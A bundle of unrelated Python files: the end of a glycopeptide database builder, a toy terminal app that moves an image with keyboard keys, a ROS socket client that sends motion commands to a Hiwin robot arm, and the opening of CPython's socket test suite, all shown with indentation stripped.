self.input_queue.put(peptide_ids[i:(i + chunk_size)])
i += chunk_size
self.log("... Dealt Peptides %d-%d %0.2f%%" % (i - chunk_size, min(i, n), (min(i, n) / float(n)) * 100))
self.log("... All Peptides Dealt")
self.dealt_done_event.set()
def create_barrier(self):
self.database_mutex.__enter__()
def teardown_barrier(self):
self.database_mutex.__exit__(None, None, None)
def create_queue_feeder_thread(self, peptide_ids):
queue_feeder = Thread(target=self.push_work_batches, args=(peptide_ids,))
queue_feeder.daemon = True
queue_feeder.start()
return queue_feeder
def spawn_all_workers(self):
self.workers = []
for i in range(self.n_processes):
worker = self.spawn_worker()
worker.start()
self.workers.append(worker)
def process(self, peptide_ids):
connection = DatabaseBoundOperation(self.connection_specification)
session = connection.session
self.log("Begin Creation. Dropping Indices")
index_controller = toggle_indices(session, Glycopeptide)
index_controller.drop()
while self.current_glycan_offset < self.glycan_combination_count:
_current_progress = float(self.current_glycan_offset + self.glycan_limit)
_current_percent_complete = _current_progress / self.glycan_combination_count * 100.0
_current_percent_complete = min(_current_percent_complete, 100.0)
self.log("... Processing Glycan Combinations %d-%d (%0.2f%%)" % (
self.current_glycan_offset, min(self.current_glycan_offset + self.glycan_limit,
self.glycan_combination_count),
_current_percent_complete))
queue_feeder = self.create_queue_feeder_thread(peptide_ids)
self.spawn_all_workers()
has_work = True
last = 0
i = 0
while has_work:
try:
batch = self.output_queue.get(True, 5)
try:
waiting_batches = self.output_queue.qsize()
if waiting_batches > 10:
self.create_barrier()
self.log("... %d waiting sets." % (waiting_batches,))
try:
for _ in range(waiting_batches):
batch.extend(self.output_queue.get(True, 1))
# check to see if any new work items have arrived while
# we've been draining the queue
waiting_batches = self.output_queue.qsize()
if waiting_batches != 0:
# if so, while the barrier is up, let's write the batch
# to disk and then try to drain the queue again
i += len(batch)
try:
session.bulk_insert_mappings(Glycopeptide, batch, render_nulls=True)
session.commit()
except Exception:
session.rollback()
raise
batch = []
for _ in range(waiting_batches):
batch.extend(self.output_queue.get_nowait())
except QueueEmptyException:
pass
self.teardown_barrier()
except NotImplementedError:
# platform does not support qsize()
pass
self.create_barrier()
i += len(batch)
try:
session.bulk_insert_mappings(Glycopeptide, batch, render_nulls=True)
session.commit()
except Exception:
session.rollback()
raise
finally:
self.teardown_barrier()
if (i - last) > self.chunk_size * 20:
self.log("... %d Glycopeptides Created" % (i,))
last = i
except QueueEmptyException:
if all(w.is_work_done() for w in self.workers):
has_work = False
continue
queue_feeder.join()
self.ipc_controller.stop()
for worker in self.workers:
self.log("Joining Process %r (%s)" % (worker.pid, worker.is_alive()))
worker.join(10)
if worker.is_alive():
self.log("Failed to join %r" % worker.pid)
if worker.exitcode != 0 and worker.exitcode is not None:
raise ValueError("One or more workers failed to exit successfully")
self.current_glycan_offset += self.glycan_limit
self.log("All Work Done. Rebuilding Indices")
index_controller.create()
|
consoleObama.py | import time
import ueberzug.lib.v0 as ueberzug
from pynput import keyboard
import os
os.system("color")
from termcolor import colored
from slowprint.slowprint import *
slowprint(colored("Made by Bira ❤️ ","magenta",attrs=['reverse','bold']),0.4)
import threading
demo = ""
moving_w = 0
moving_a = 0
moving_s = 0
moving_d = 0
def oabam_thread():
global demo
with ueberzug.Canvas() as c:
path = "obama.jpg"
demo = c.create_placement('demo',x=0, y=0, scaler=ueberzug.ScalerOption.COVER.value)
demo.path = path
demo.visibility = ueberzug.Visibility.VISIBLE
print(type(demo))
time.sleep(999999999)
def on_press(key):
global demo
global moving_a
global moving_w
global moving_s
global moving_d
try:
if key.char == "d":
moving_d=1
elif key.char == "a":
moving_a=-1
elif key.char == "s":
moving_s=1
elif key.char == "w":
moving_w=-1
except AttributeError:
print('\n')
def on_release(key):
global moving_a
global moving_w
global moving_s
global moving_d
if key == keyboard.Key.esc:
# Stop listener
return False
try:
if key.char == "d":
moving_d=0
elif key.char == "a":
moving_a=0
elif key.char == "s":
moving_s=0
elif key.char == "w":
moving_w=0
except:
print("ERRORS")
def listener():
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
def constant_movement():
global moving_a
global moving_w
global moving_s
global moving_d
global demo
while True:
demo.x = demo.x + moving_a + moving_d
demo.y = demo.y + moving_w + moving_s
time.sleep(1/30)
print("got here")
obama_threaded = threading.Thread(target=oabam_thread)
obama_threaded.start()
listener_thread = threading.Thread(target=listener)
listener_thread.start()
time.sleep(1)
move_thread= threading.Thread(target=constant_movement)
move_thread.start()
|
Hiwin_RT605_ArmCommand_Socket_20190627195308.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command(s):
global arm_mode_flag,data
# if arm_mode_flag == True:
# arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", s)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
s.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
global arm_mode_flag
Socket = s
while 1:
if arm_mode_flag == True:
arm_mode_flag = False
print (11111)
Socket_command(Socket)
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
test_socket.py | import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
